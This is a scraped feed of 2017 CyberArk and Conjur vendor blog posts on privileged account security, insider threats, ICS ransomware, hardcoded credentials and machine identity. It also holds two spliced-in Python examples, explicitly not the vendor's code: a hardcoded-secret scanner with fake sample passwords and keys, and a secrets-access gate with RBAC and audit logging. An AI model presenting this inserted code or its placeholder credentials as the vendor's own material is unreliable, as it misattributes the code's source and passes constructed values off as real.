The cloud automation capabilities include CyberArk AMIs (Amazon Machine Images) and take advantage of AWS CloudFormation templates to automate the deployment of CyberArk solutions. CloudFormation is designed to give developers and systems administrators an easy way to create, manage and provision a collection of related AWS resources.

Importantly, the CyberArk architecture leverages AWS privileged account security best practices, including separate AWS Availability Zones for the primary and DR vaults. It is designed to ensure that the vaults are both independent from each other and also independent from the cloud assets secured.

Of course there are important prerequisites. First, you will need a valid CyberArk license and an AWS account. You will also need to set up the pre-configured AWS environment to prepare for the automated deployment of the CyberArk solution. This includes AWS VPCs (Virtual Private Clouds), private and public subnets, and Security Groups. Fortunately, to make it easier, an additional CloudFormation template is available from CyberArk to automate the setup and configuration of the AWS environment.

Other Cloud Solutions

We’re excited to offer these new cloud automation capabilities to facilitate deployments of CyberArk solutions for cloud customers. These new capabilities are in addition to our other security capabilities designed specifically for AWS, which include an integration with Amazon Inspector and CyberArk DNA to simplify discovery and prioritization of privileged account risk, enhanced AWS Access Key protection, and an integration with the AWS Security Token Service to allow secure single sign-on to the AWS Management Console. CyberArk also supports and works with other leading cloud vendors.

If you plan to attend the CyberArk Impact 2017 customer event in Italy later this month, you can learn more in the session led by a Senior Solution Architect from AWS. Additional information about how to use CyberArk to secure privileged accounts and credentials in AWS is also available on our website.

Insiders and the Privileged Pathway of Attacks https://www.cyberark.com/blog/insiders-privileged-pathway-attacks/ Tue, 25 Apr 2017 17:02:13 +0000 https://www.cyberark.com/blog//

Corroborating the recent surge in headlines, a new industry study reveals that 56 percent of security professionals surveyed say insider threat incidents have become more frequent in the past 12 months.

As we’ve covered in previous posts, insiders present a particularly challenging security conundrum. Those who gain access to privileged credentials can initiate seemingly legitimate privileged user sessions. Take, for example, reports of a former IT director at a sportswear company who created a privileged, unauthorized backdoor account that provided him access to the corporate network for nearly two years after he left the company.

Though insiders may have a variety of motives, the attack pathway they follow is similar. The first step in carrying out an insider attack is to gain inside access. This image shows the typical path attackers follow to complete their mission.

Without automated real-time detection and alerting on risky activities within privileged sessions, an inside attacker may operate undetected for long periods of time.

In order to block insider attacks, it’s critical to first block the privileged pathway that leads to your organization’s most sensitive assets and information. CyberArk’s comprehensive solution for privileged account security offers proactive controls to reduce the risk of intentional and unintentional insider threats, as well as real-time monitoring and threat analytics to aid in detection of unauthorized accounts and in-progress attacks.

Here’s a look at how the CyberArk solution works at each critical step of the privileged pathway to control and monitor privileged accounts to minimize the risk of insider threats.

Learn more about how CyberArk can help you protect against the growing insider threat, and download our free eBook, The Danger Within: Unmasking Insider Threats.

Q&A: Three Reasons I Chose to Become a Conjur Advisor https://www.cyberark.com/blog/qa-three-reasons-i-chose-to-become-a-conjur-advisor/ Tue, 25 Apr 2017 15:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/qa-three-reasons-i-chose-to-become-a-conjur-advisor/  

Correy Voo has known Conjur for several years and recently became an advisor to the company. His distinguished career includes senior technology leadership roles at global telecommunications and global financial services firms, chairing industry groups, and advising a number of innovative startups. He is currently Chief Technology Officer at Showt.

We recently had a chance to chat with Correy regarding his involvement with Conjur.

Conjur: Correy, thanks for your advice and support to-date, and for taking a few minutes for this chat. Please tell us a bit about your background.

Correy: I’ve been in roles at the intersection of business and technology for most of my career. I started out in consulting with BT, where I ultimately became the CTO and Chief Architect. Then I went to Bank of America for several years in a similar CTO / Chief Architect capacity and then spent a few years at UBS as Platform Services CTO / Group CTO where I had various responsibilities such as setting the technology strategy for bank-wide technology services. In those roles, I was always exposed to interesting startups and upon leaving UBS I decided to focus my energies on working with startups more closely and more formally, and on starting up my own technology firms as well.

How Did You Connect with Conjur?

Whilst at UBS, I was in the Boston area for business and was invited by our Wealth Management division to attend a client dinner engagement for the Boston Tech / Financial Services community that Elizabeth (Lawler, Founder and CEO of Conjur) was also attending. We got to chatting about Conjur and what it was offering in the area of Next-Generation Privileged Access Management (PAM) and that was the nexus for an ongoing dialogue regarding market dynamics, product strategy, and so on. Those conversations started to become more frequent, and at some point it just made sense that I formally sign on as an advisor.

Why Did You Decide to Work With Conjur?

I saw that the firms I worked with and the startups that were vying for their business were still solving problems for the “old world”. Conjur was unique in several ways that intrigued me regarding a very forward-looking view of where the world was going in terms of utility computing and automation, and specifically how to maintain the necessary levels of controls when using these new technology options.

Firstly, Automation. Conjur provides the first solution to market that is focused on solving the PAM problem for DevOps. If you look at the development and direction that technology is evolving in – Machine learning, AI, automation, robotics, etc. – it involves less and less participation from humans. All the PAM solutions to-date are designed to be human-centric and in the new world, the human is typically the bottleneck. Conjur is built for the new world — if an application or machine is asking for access, so long as it’s within policy, it can be granted without human involvement in a secure, controlled and policy assured manner which is still in keeping with the need to protect and defend critical assets and processes.

Secondly, Ease of Use – Conjur is built for business and DevOps to help them address security and compliance demands in a rapidly evolving and highly flexible set of operational conditions. The incumbents are all built with the security admin in mind as the target user. What’s needed today is a solution that allows business users to apply security to the right things for the right reasons using policy. Conjur is a business tool that manages security, rather than a security tool per se – it fits well into the new world operating models and processes that are being used to run modern businesses. Conjur is a tool for modern Business Technology, not legacy boundary controls.

Most importantly, Conjur is built for the Cloud and other modern infrastructure and application technologies. All industries that have developed reliance upon infrastructure and application technologies will continue to evolve and, in doing so, will continue to exploit more effective technology solutions such as Machine Identity, IoT, and M2M computing at significant scale. Everyone has been trying to get current PAM solutions like CyberArk and the like to work in the new world – cloud, containers, utility computing – and finding that they are not suitable – old world practices just do not work with modern, boundary-less, agile solutions. Companies trying to control applications and services in external cloud systems like AWS and Azure the same way they controlled their traditional data centers are struggling. Most medium and large organizations are living in a hybrid reality where they’ve still got a significant legacy data center footprint, lots of new cloud-based infrastructure, and there are more new technologies, architectures, etc. coming down the road. Companies need to be able to apply common policy controls across an increasingly fragmented and evolving set of services and infrastructures from a common control framework that still addresses the corporate risks. Conjur is the only system available that had the practical functionality to support this hybrid current-state moving to future-state.

Where Would You Like to See Conjur Evolve?

In terms of where the technology is today, I think Conjur and its customers and prospects have a significant opportunity to deploy the technology as a migration platform to help customers move off of legacy IT and onto modern IT platforms. Conjur has the ability to reach into the old world and help pull companies forward to the new services by applying a uniform set of policies across all.

As far as what the future holds, I’d like to see Conjur put machine learning into the product so that humans can be further removed from the day-to-day repetitive tasks of policy management, enforcement and governance – once the fundamental principles have been configured into the master policy console. This will allow users to start with static rules that are initially manually defined and then use the system to learn more about how the environment is actually operating based on those rules and how things are being added / changed etc. It would be interesting to have dynamism built into the platform so that it’s constantly learning and growing through inference and experience so that it is able to self-govern based upon a set of master policies which are described as business rules.

Any Parting Thoughts?

As a long-time technology geek, it is always good to see a small company take an idea and cause waves in a traditional domain, constantly challenging the status quo in a market that has a lot of outdated, legacy ideas and companies. I’m enjoying helping Conjur punch way above its size — as evidenced by your traction in terms of customer wins, partner engagements, and traction with the analyst community.

New Wave of Ransomware Could Put Utilities at Risk https://www.cyberark.com/blog/new-wave-ransomware-put-utilities-risk/ Tue, 18 Apr 2017 20:59:45 +0000 https://www.cyberark.com/blog//

The stakes for protecting against ransomware are about to get higher as malicious tools evolve to target Industrial Control Systems (ICS) and threaten critical infrastructure.

Researchers have demonstrated proof-of-concept ransomware attacks against programmable logic controllers (PLC) used in many operational environments, including utilities. Unlike attacks against corporate networks, which can result in expenses and revenue loss, ICS attacks could shut down critical operational systems, damage or destroy physical equipment and threaten human safety.

Ransomware Economics

Ransomware so far has been a high-volume business, blocking access and encrypting files on corporate networks and even individual computers. Not everyone pays, but if the ransom is low enough, many do pay in order to save time or avoid the inconvenience of recovering files. Paying ransom is neither recommended by experts, nor is it a guarantee files will be decrypted.

These targets provide a relatively low return for attackers, but the high volume of targets and the ease of exploiting them make it worthwhile. Hollywood Presbyterian Medical Center, for example, paid $17,000 last year to regain access to its network.

The cost of an attack can be far greater than the ransom. A small city-owned utility in Michigan suffered a ransomware attack in April 2016 that effectively shut down its e-mail and phone systems. The article indicates it cost about $2 million to clean up after the attack. The utility had “to recover control of its communications systems, identify digital vulnerabilities and apply security upgrades that would prevent or severely limit the impact of another ransomware attack.”

Although utilities and hospitals are potentially high-value victims, in both of these cases corporate and administrative resources were targeted. Such attacks are serious, but less so than if critical control systems for water treatment or patient care had been at stake. So far, most successful attacks on critical infrastructure have been carried out by nation states, such as the 2015 breach of the Ukraine power grid. These exploits against critical infrastructure have not involved ransomware.

Evolution of the Ransomware Business Model

Researchers from the Georgia Institute of Technology demonstrated proof-of-concept ICS ransomware at the RSA 2017 Conference in February. As detailed in their paper, they attacked commercial PLCs in a simulated water treatment plant using the LogicLocker ransomware worm. This enabled researchers to bypass weak authentication mechanisms, ultimately “locking legitimate users from easily recovering the PLC, and replacing the program with a logic bomb that begins to dangerously operate physical outputs threatening permanent damage and human harm if the ransom is not paid in time.” In the simulation, chlorine was dumped into the water supply.

Because of the premium on uptime in operational environments, PLCs often go for long periods without patching or fixing vulnerabilities. The researchers were able to find 1,846 vulnerable Internet-facing PLCs. “This only represents a small portion of the total potential attack surface,” they wrote, because attackers can easily target user devices on a corporate network and use compromised access to pivot to thousands more PLCs.

PLCs are attractive, high-value targets. The ransom in such a case would be commensurate with the risk. Such attacks, however, are sophisticated and require knowledge of the underlying physical process behind the control system. Such intel can be gained via reconnaissance, if an attacker breaches a network and remains undetected.

Maintaining Control of an Infrastructure

Traditional perimeter defenses such as antivirus are not enough to block ransomware. The Michigan utility cited above believed it was protected, only to discover that its antivirus did not detect the malicious code. And unlike traditional malware, ransomware typically does not need administrative privileges to execute and take data hostage. Instead, it exploits basic read, write and edit permissions on files, which are needed by almost every employee in an organization. Making matters worse, once the ransomware infects one machine on a network, it can easily spread through network drives or by stealing and reusing credentials on connected machines.

As we have reported, the most effective way to mitigate the risk of ransomware is to prevent unknown applications from gaining the read, write and edit permissions needed to encrypt files. This applies to ICS as well as to corporate networks. Proactive measures can be taken before a threat becomes reality. Implementing application whitelisting in top-hierarchy control computers such as Human-Machine Interfaces (HMIs) represents one of the most critical steps in securing an ICS network.

The CyberArk Endpoint Privilege Manager enables organizations to control and whitelist applications as well as remove local administrator rights from HMIs; it seamlessly elevates privileges based on an organization’s policy, as required by trusted (whitelisted) applications. This enables organizations to prevent unknown applications – including the latest variants of ransomware – from gaining the permissions needed to encrypt files on an infected machine.

To prevent ransomware (and other malware) from spreading between infected user devices and critical systems, organizations should isolate all access to their critical systems. The CyberArk Privileged Session Manager isolates remote user sessions on ICS targets, while allowing these sessions to be monitored and recorded. This helps block the spread of desktop malware and mitigates the risk of credential theft. By protecting privileged ICS accounts as critical assets, utilities can defend against having these assets held for ransom and endangering the health and welfare of their customers.

The CyberArk solution offers end-to-end privileged account protection for industrial control systems. For more information, join us on April 27 for a webinar, “Best Practices for Preventing Ransomware in Industrial Control Systems Through Privileged Security Controls.”

7 Practices that Make Your Organization Vulnerable to Cyber Attacks https://www.cyberark.com/blog/13264-2/ Fri, 14 Apr 2017 13:41:20 +0000 https://www.cyberark.com/blog//

Today I read “How you can be the smartest cybersecurity expert in the room” on CIO.com. The author notes, “many CIOs and senior IT leaders are almost clueless about where to focus and how to start building next-gen security functions.” He references 20 CIS Critical Security Controls presented by the SANS Institute that organizations can implement to dramatically reduce risk. He acknowledges that list is too much for most busy IT teams, so he directs readers to focus on the top five CIS controls which can still lead to an “85 percent reduction in raw cyber security vulnerabilities.”

If you happen to be one of the smartest security people in the room, you already know that critical security control #5 is “Controlled Use of Administrative Privileges.” Where does this stand on your priority list?

Answer the questions below and consider whether or not your team has good or bad habits in place. If you answered yes to the questions below, your organization is susceptible to an attack. It’s time to implement controls around privileged credentials.

Learn more in The CISO View research report, “Rapid Risk Reduction: A 30-Day Sprint to Protect Privileged Credentials.”

Effective Secrets Management in DevOps: Towards a Trust-Forward Design https://www.cyberark.com/blog/effective-secrets-management-in-devops-towards-a-trust-forward-design/ Fri, 07 Apr 2017 14:56:00 +0000 https://cyberarkvx2.wpengine.com/blog/effective-secrets-management-in-devops-towards-a-trust-forward-design/  

Trust has been important in computing systems since the first business practices were put into place. Modern double entry accounting was invented in Genoa, Italy in 1340 as an error-detection mechanism. Chinese seals, also known as chops, from 300 BCE were an early technical mechanism to codify and confer trust among business actors. Seeing the red square seal of a business associate meant that you could trust a document’s veracity.

Today’s IT systems also capture trust relationships explicitly, from authentication and role information in LDAP to multi-tiered privileged access management systems. At Conjur we’ve observed our DevOps-heavy users manage trust as a first-class construct. In particular, trust needs to be applied system-wide, validated continuously, and reasoned about definitively. We’ve begun to develop a management language for that purpose — we call it a “trust-forward design”.

In our whitepaper Towards a Trust-Forward Design, we discuss a number of uses across which a trust-forward system can be implemented, from handling small tactical use cases to the underlying components of a trust-forward design.

Take for example the sharing of database passwords from enterprise systems to a temporary public cloud infrastructure. That involves a temporary granting of authority. The ability to audit that transfer of trust and being assured that the grant is automatically revoked when the job is complete is a real-life example of a trust-forward design goal. A mechanised, regular rotation of system passwords or keys is another case of the need for trust-forward design.

Motivations: DevOps, Cloud, APIs

Authentication and authorization have been part of computer systems since the first time-sharing machines. Those techniques like LDAP and RBAC are a good base to start from, but what makes them less capable to handle the needs of trust today? DevOps, cloud network as-a-service offerings, broader data and API integration, autonomous capabilities, and shorter development cycles are driving the need for new trust features in architectures.

DevOps’ strength comes from heavy use of automation to reduce friction in deployment. That automation puts stress on authentication and authorization systems that were not designed for it. A continuous integration process may run many times a day, deploying an application into testing or even production without further human intervention. Similarly, PaaS (platform as a service) enables a development team to instantiate a new application or a new version of an application with a few keystrokes, compressing a multi-step effort into a single click. As such, development cycles are shortened. Manual authorization steps are too slow to keep pace with a system that reacts to changes on the order of hundreds or tens of milliseconds. An advanced trust-forward system is designed to handle detailed delegation of authority to automatic processes.

Cloud network-based “as-a-service” companies have proliferated on the public internet exposing APIs for previously internally managed functions like telephony, payment processing, big data, security scanning, among many, many others. Even internal centrally managed as-a-service functions must document and audit trust for their users who are departmental light-years away. While cryptographic techniques are available for some protection of data at rest or in transit, ultimately data and processes must be uncloaked to be operated on.* A high degree of trust is needed to reap the benefits of these offerings. A trust-forward system helps to make these trust relationships explicit.

Further, modern applications’ value is often in integrating large, previously separate databases and APIs. The breadth of data sources and endpoints ultimately means better experiences for end users. For example, one can book an entire travel schedule from a single interface. With that integration power also comes a need for trust in sharing a potential itinerary or traveler profile. Access to disparate data and APIs crosses siloed domains. A trust-forward system can get a handle on what is authorized and what happened in the past across a large number of identities.

Autonomous capabilities in the network as with DevOps (not to mention in physical space with mobile devices and IoT sensors) will need better security and trust relationship management at a very large scale and speed. And the pace of new architectures like serverless or FaaS computing is accelerating. While initial needs may be small, starting a trust-forward project means that the complexity of future projects’ trust requirements can be considered.

In Towards a Trust-Forward Design, we start with the domain of secrets management, which is a prototype trust-forward system. We discuss business motivations from tactical to strategic, and close with an outline of what constitutes a trust-forward system and some optional capabilities. This is an initial declaration and we invite you to join us in elevating trust as a computable notion.

Please take a moment to download our free whitepaper.

—-

*Until researchers deliver practical homomorphic cryptography, the ability to operate on encrypted data without decryption, that is.

Your Greatest Threat Might Already Be Inside Your Network https://www.cyberark.com/blog/greatest-threat-might-already-inside-network/ Wed, 05 Apr 2017 14:24:38 +0000 https://www.cyberark.com/blog//

Insider activity—both malicious and simple error—accounts for a growing share of data breaches. Statistics are difficult to come by because requirements for reporting security incidents are not consistent across sectors. But some studies show they account for more than half of those breaches analyzed.

According to the Protenus Breach Barometer for February, a monthly analysis of reported breaches in the healthcare industry, 58 percent were related to insiders. This was divided about evenly between intentional wrongdoing and error. Outside hacking accounted for just 13 percent. The problem is not confined to any single industry. New York State Attorney General Eric T. Schneiderman reported in March that his office received a record number of data breach reports in 2016, nearly 1,300. Employee negligence and wrongdoing were blamed for 37 percent.

Because the insider doesn’t have to penetrate perimeter defenses, these breaches can be difficult to discover. According to the Protenus report, breaches reported in February were on average 478 days old at the time of discovery. In two instances, it was more than five years before breaches were discovered.

Dealing with the insider threat is difficult for any organization. But it is imperative, and you can guard against it with the right tools if you know what to look for.

The Weakest Link

Organizations invest substantial resources in procuring, updating and securing the IT enterprise, but the human element is a wild card. “The weakest link for any organization is not its systems, but rather the human factor,” the latest Verizon Data Breach Digest concludes. The challenge of defending against the insider is compounded by the mistakes of well-meaning employees. “It is important to note that these incidents are not always the result of a malicious employee and often stem from carelessness and lack of awareness regarding sound IT protocol.”

Employees are on the network as legitimate users with legitimate credentials and user privileges, generally using the network in the ways that are intended. This can make it easy for a malicious insider to cover his or her tracks, and honest mistakes might not trigger alerts for the security staff.

Defending against this threat requires more than traditional perimeter defenses. Organizations need to be continually aware of who their privileged users are and what they can access, and the privileged accounts and credentials must be managed throughout their lifecycle. In one recently reported incident, a former systems administrator at a healthcare facility was charged with hacking the facility’s systems using administrative credentials that had not been revoked more than two years after he had resigned.

Self Defense

Defending against insider threats requires having visibility into your network and knowing what to look for.

From our experience in securing privileged accounts, we have identified behaviors and anomalies that help companies identify malicious or damaging behavior. In a recent blog we shared 10 commands that are frequently associated with risky behavior. As my colleague notes in the blog, “It’s always worth noting that no two situations are the same, so an action that may be harmless in one situation may create a major security issue in another.” But this list provides a starting point in monitoring your network for suspicious activity.

We also recently announced the latest release of the CyberArk Privileged Account Security Solution with advanced insider threat detection. A new data feed from CyberArk Privileged Session Manager to CyberArk Privileged Threat Analytics lets security teams receive customizable, prioritized alerts about possible high-risk privileged activity. You can watch suspicious sessions in progress and terminate malicious sessions, all from one platform.

Learn more about how CyberArk can help you manage privileged accounts and protect yourself against the growing insider threat.

Securing Assets and Applications in the Cloud https://www.cyberark.com/blog/securing-assets-applications-cloud/ Thu, 30 Mar 2017 17:33:06 +0000 https://www.cyberark.com/blog//

In our recent blog, Cloud Security: Who is Responsible for What?, we focused on the idea of shared responsibility in cloud environments; with IaaS/PaaS, the customer is responsible for everything above the hypervisor, while the cloud vendor takes responsibility for the infrastructure itself.

We also addressed how the public cloud vendors’ management consoles are a key weak point and consequently an attractive target for an attacker, often via a phishing attempt. As such, it’s important to lock down and secure privileged credentials in a digital vault to secure the management console. Now, I’d like to further address the enterprise’s responsibilities, specifically the functions above the hypervisor, including securing the privileged credentials used by applications and scripts accessing other applications and assets, such as the enterprise’s customer database. Unfortunately, these credentials are all too often hardcoded. This is a particularly troubling vulnerability as there can be a large number of hardcoded credentials used throughout cloud and hybrid environments.

Hard-coding and embedding credentials in the code or a script can initially make them easy to use – but this represents a significant vulnerability because attackers or malicious insiders can also easily access them, especially if the credentials are in clear text. But, even worse, when credentials are hard-coded or locally stored, they are nearly impossible to rotate, further making them a static and easy target for attackers.

The risk is real. As part of the DevOps process developers often share source code they’ve developed on code repositories such as GitHub. While it’s part of the DevOps process, it’s an all too common example of how embedded passwords and credentials can become public if they’re hardcoded. Even if the code is only saved in the enterprise’s internal code repositories – those passwords and credentials can easily be accessed by other developers and used either inadvertently or maliciously. It also becomes difficult, if not impossible, to fully identify which applications or scripts are interacting with other applications and other enterprise assets.

In the past, these mistakes might not have been so risky, exploitable and damaging within an on-premises environment. However, in a cloud environment, because of the rapid pace of change, the ability to quickly scale, and the tools being used, these vulnerabilities are amplified and can pose unacceptable levels of risk.

To minimize risk and follow best practices, enterprises should avoid hardcoding passwords and credentials used by applications and scripts, and instead, secure credentials in a secure digital vault and rotate them according to policy. With this approach, just like with human users, enterprises can assign unique credentials to each application, code image or script, and then track, monitor and control access via a secure digital vault. Taking this approach, IT administrators will know which applications access resources such as a customer database. Also, when an application or script is retired, the administrator or script can simply turn off the credentials.
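As an added example (not CyberArk’s or Conjur’s code), the scanner below flags credential-looking string literals in source text before it is pushed to a shared repository, while ignoring values that are fetched at runtime and suppressing obvious placeholders so reviewers are not flooded with false positives. The regex, placeholder list and sample source lines are constructed for illustration.

```python
import math
import re
from typing import List, Tuple

# Identifier fragments that commonly name a credential.
CREDENTIAL_NAME = (
    r"(?:password|passwd|pwd|secret|token|api[_-]?key|access[_-]?key|private[_-]?key)"
)

# Matches `name = "literal"`, `name: 'literal'` or `name := "literal"` where the
# identifier contains a credential word and the value is a quoted literal of at
# least 8 characters. Values pulled at runtime (os.environ[...], a vault call)
# are not quoted literals on the assignment line and therefore never match.
ASSIGNMENT = re.compile(
    r"(?i)(?P<name>[A-Za-z_][\w.-]*" + CREDENTIAL_NAME + r"[\w.-]*)"
    r"\s*[:=]+\s*(?P<quote>[\"'])(?P<value>[^\"']{8,})(?P=quote)"
)

# Obvious stand-ins that are not real secrets; suppressed to cut false positives.
PLACEHOLDERS = {"placeholder", "changeme", "password", "xxxxxxxx", "<redacted>"}


def shannon_entropy(value: str) -> float:
    """Bits of entropy per character; high values suggest a generated key."""
    length = len(value)
    counts = {ch: value.count(ch) for ch in set(value)}
    return -sum(c / length * math.log2(c / length) for c in counts.values())


def scan_source(text: str) -> List[Tuple[int, str, float]]:
    """Return (line_number, identifier, entropy) for each suspected hardcoded credential."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        match = ASSIGNMENT.search(line)
        if not match:
            continue
        value = match.group("value")
        if value.lower() in PLACEHOLDERS:
            continue  # a stand-in, not a secret worth a ticket
        findings.append((line_no, match.group("name"), round(shannon_entropy(value), 2)))
    return findings


# Constructed sample of a script as it might be committed (hypothetical values).
SAMPLE_SOURCE = """\
import os
DB_HOST = "customer-db.internal"
DB_PASSWORD = "Sup3rSecret!2017"                   # embedded; leaks with the repo
AWS_SECRET_ACCESS_KEY = 'EXAMPLEKEY0123456789abcdefghijklmnop'
api_token = os.environ["API_TOKEN"]                # injected at runtime
password = get_secret("db/customer/password")      # fetched from a vault at runtime
# password = "placeholder"
"""

if __name__ == "__main__":
    for line_no, name, entropy in scan_source(SAMPLE_SOURCE):
        print(f"line {line_no}: {name} looks hardcoded (entropy {entropy} bits/char)")
```

Run as a pre-commit or CI step, the same function can be pointed at every changed file so an embedded password is caught before it reaches the repository.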

A core business benefit of cloud is elasticity – the ability to easily and instantaneously scale up and scale down the number of compute instances, or virtual servers, to meet the needs of the business at a specific point in time. With on-demand cloud computing, the business only pays for the compute, storage and other resources they use. No human intervention is required. The cloud automation tools are either built-in as a capability of the public cloud vendor’s offerings, such as AWS Auto Scale, or as part of the orchestration and automation tools used with DevOps, such as Puppet, Chef, Ansible, etc.

On-demand computing in the cloud, enabled by the automation tools, is a huge business benefit, but it also presents challenges and new potential risks – when these new application instances are created and launched, they need privileges and credentials to access resources. The automation tools can provide the credentials, but these credentials also need to be secured. Consequently, when a new application instance is created, as the compute environment dynamically scales, a best practice is to immediately secure the permissions and credentials assigned to the new instance in the secure digital vault. This ensures that the credentials can immediately be monitored, managed, secured and rotated according to policy. When the compute instances are retired, the associated credentials can also be removed. This is achieved with integrations between the various automation tools and the secure digital vault.

Whether the enterprise is fully in the cloud with IaaS or PaaS or is migrating to the cloud, it is critical to ensure applications, scripts and other assets use secure passwords and privileged credentials to access other applications and assets in the cloud.

Increasingly, businesses leverage the CyberArk Application Identity Manager to store, monitor, track and rotate credentials and passwords according to policy in the secure digital vault for their cloud and elastic compute environments. Learn more here.

Machine Identity, And Why It’s A Thing https://www.cyberark.com/blog/machine-identity-and-why-its-a-thing/ Thu, 30 Mar 2017 15:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/machine-identity-and-why-its-a-thing/  

What is Machine Identity?

Maybe the first time you saw the term machine identity you thought of a science fiction concept like singularity, SkyNet, or “I, Robot”. The term “service account” is probably a more familiar concept. Machine identity is the application of familiar privileged access management (PAM) concepts including identity, authentication, RBAC, least-privilege, auditing, etc. to non-human network entities (processes, services, containers and hosts).

Why is it important?

The goal of DevOps is to reliably increase the rate of change of applications and infrastructure. “Securely” is often added to that objective (hence DevSecOps). It is impossible to manage large quantities of virtual infrastructure (a cloud) without automation. Increasingly, IT automation is becoming less directed by human administrators, more autonomous. Privileged autonomous processes build and deploy applications, provision and configure infrastructure, and decide how to remediate problems. That is a lot of responsibility to entrust to non-human actors that are otherwise accountable to no one, that are making full-stack changes in production networks. Once auditors pick up on this fact, they will demand to see how these software robots are under control, as they demanded to see controls and proof of controls for human sysadmins. We need to securely manage processes running in a network by authenticating them and controlling their privileges.

What is the current practice?

Secrets management was a concept unfamiliar to many just a couple of years ago. Now most organizations at least attempt to control access to passwords and keys. The first step is removing those values from scripts and applications, storing them in secure vaults or key stores, and dynamically fetching them as needed. That is the onramp to machine identity. Access to secrets needs to be controlled, and many times it is a process that needs access. Currently many processes run as a conventional user identity – service accounts. Access to secrets is authenticated with conventional means like LDAP. But it soon becomes evident that for privileged software robots, more control is needed. In traditional / human-oriented scenarios, organizations deployed Privileged Access Management (PAM) solutions to address this challenge. However, human-oriented PAM solutions do not support the correct semantics and cannot scale to meet the dynamic nature of cloud requirements.

Is anybody doing this already?

As we might expect, Google is ahead of the curve, with a full service-identity management architecture to manage their cloud platform:

“Each service that runs on the infrastructure has an associated service account identity. A service is provided cryptographic credentials that it can use to prove its identity when making or receiving remote procedure calls (RPCs) to other services. These identities are used by clients to ensure that they are talking to the correct intended server, and by servers to limit access to methods and data to particular clients.”

Historically, classic PAM semantics granted or denied human access to non-human resources in relatively static IT environments. Now, in the cloud, non-human resources need controlled access to other non-human resources, with massive degrees of concurrency and scale. It’s no wonder that what worked before doesn’t work any more and new solutions must be developed.

PAM is dead, long live PAM

Let us not be too hasty to toss out concepts that have served us well. We can bring forward legacy PAM concepts and modernize them to work for us in the new DevSecOps cloud environments. This implies tackling use cases such as authenticating our Jenkins server, authorizing it to retrieve database passwords ONLY for development database servers, and deploying ONLY to development repositories. All we really need is a way to let the process uniquely identify itself and, once its identity is established, grant access to the appropriate resources and deny access to all others. In the same vein, we can authorize our cloud automation engine to create uniquely identifiable hosts and processes that are in turn authenticated and granted access to only the resources they need. This is possible today, but we need a new way to implement the old concepts.

Here are just a few of the key capabilities that are crucial for a machine identity service that can secure your Cloud and DevOps infrastructure:

  • Application of identities to all sorts of non-human constructs including servers, VMs, containers, and CI jobs
  • Multi-factor machine authentication using attributes such as container ID, host API key, environment API key, namespace API key, IP address / CIDR range, and other attributes and (potentially custom) metadata
  • Assigning roles and performing roles-based access control (RBAC) for machine operations
  • Immutable audit logging, and human-consumable compliance reporting on machine activity
  • Encryption always, for data at rest and in motion.
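The Jenkins scenario above, worked through as an added example (this is illustrative Python, not Conjur's API or policy language, and not code from this post): an identity enrolled with several machine attributes (API key, source CIDR, namespace), RBAC that grants read access to development database passwords only, and a hash-chained audit log that records every request, granted or denied. All identity names, keys, paths and addresses are constructed.

```python
"""Machine-identity gate for a CI job: constructed example, not Conjur's API.

A Jenkins identity authenticates with several machine attributes, is authorised
to read development database passwords only, and every request, granted or
denied, is appended to a hash-chained (tamper-evident) audit log.
"""
import hashlib
import hmac
import ipaddress
import json
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set


@dataclass(frozen=True)
class MachineIdentity:
    """A non-human principal (host, container, CI job) and its enrolled factors."""
    name: str
    api_key: str       # per-identity API key issued at enrolment (hypothetical value)
    allowed_cidr: str  # network the identity is expected to authenticate from
    namespace: str     # e.g. a CI environment label or Kubernetes namespace


@dataclass
class AuditLog:
    """Append-only log; each entry binds the hash of the entry before it."""
    entries: List[dict] = field(default_factory=list)
    GENESIS = "0" * 64

    @staticmethod
    def _digest(prev: str, event: dict) -> str:
        return hashlib.sha256((prev + json.dumps(event, sort_keys=True)).encode()).hexdigest()

    def append(self, event: dict) -> None:
        prev = self.entries[-1]["hash"] if self.entries else self.GENESIS
        self.entries.append({"event": event, "prev": prev, "hash": self._digest(prev, event)})

    def verify(self) -> bool:
        """Recompute the chain; an edited or removed entry breaks it."""
        prev = self.GENESIS
        for entry in self.entries:
            if entry["prev"] != prev or self._digest(prev, entry["event"]) != entry["hash"]:
                return False
            prev = entry["hash"]
        return True


class SecretsGate:
    """Authenticate a machine by several attributes, then apply RBAC to secrets."""

    def __init__(self) -> None:
        self.identities: Dict[str, MachineIdentity] = {}
        self.roles: Dict[str, Set[str]] = {}    # identity name -> roles held
        self.grants: Dict[str, List[str]] = {}  # role -> readable secret path prefixes
        self.secrets: Dict[str, str] = {}
        self.audit = AuditLog()

    def enrol(self, ident: MachineIdentity, roles: Set[str]) -> None:
        self.identities[ident.name] = ident
        self.roles[ident.name] = roles

    def authenticate(self, name: str, api_key: str, source_ip: str, namespace: str) -> bool:
        """Every factor must match: key (constant-time compare), source network, namespace."""
        ident = self.identities.get(name)
        if ident is None:
            return False
        key_ok = hmac.compare_digest(ident.api_key, api_key)
        net_ok = ipaddress.ip_address(source_ip) in ipaddress.ip_network(ident.allowed_cidr)
        return key_ok and net_ok and ident.namespace == namespace

    def fetch(self, name: str, api_key: str, source_ip: str, namespace: str,
              secret_path: str) -> Optional[str]:
        """Release the secret only if authenticated AND some held role grants the path."""
        authenticated = self.authenticate(name, api_key, source_ip, namespace)
        allowed = authenticated and any(
            secret_path.startswith(prefix)
            for role in self.roles.get(name, set())
            for prefix in self.grants.get(role, []))
        # Denied attempts are logged too: they are the red flags the SOC wants to see.
        self.audit.append({"identity": name, "source_ip": source_ip, "namespace": namespace,
                           "secret": secret_path, "authenticated": authenticated,
                           "allowed": allowed})
        return self.secrets.get(secret_path) if allowed else None


def build_demo_gate() -> SecretsGate:
    """Constructed data: a Jenkins job that may read dev database passwords only."""
    gate = SecretsGate()
    gate.secrets["db/dev/app-password"] = "dev-secret-EXAMPLE"
    gate.secrets["db/prod/app-password"] = "prod-secret-EXAMPLE"
    gate.grants["dev-deployer"] = ["db/dev/", "repo/dev/"]
    gate.enrol(MachineIdentity("host/jenkins-01", "jk-key-EXAMPLE", "10.20.0.0/24", "ci-dev"),
               {"dev-deployer"})
    return gate


if __name__ == "__main__":
    gate = build_demo_gate()
    print(gate.fetch("host/jenkins-01", "jk-key-EXAMPLE", "10.20.0.7", "ci-dev", "db/dev/app-password"))
```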

 

 

]]>
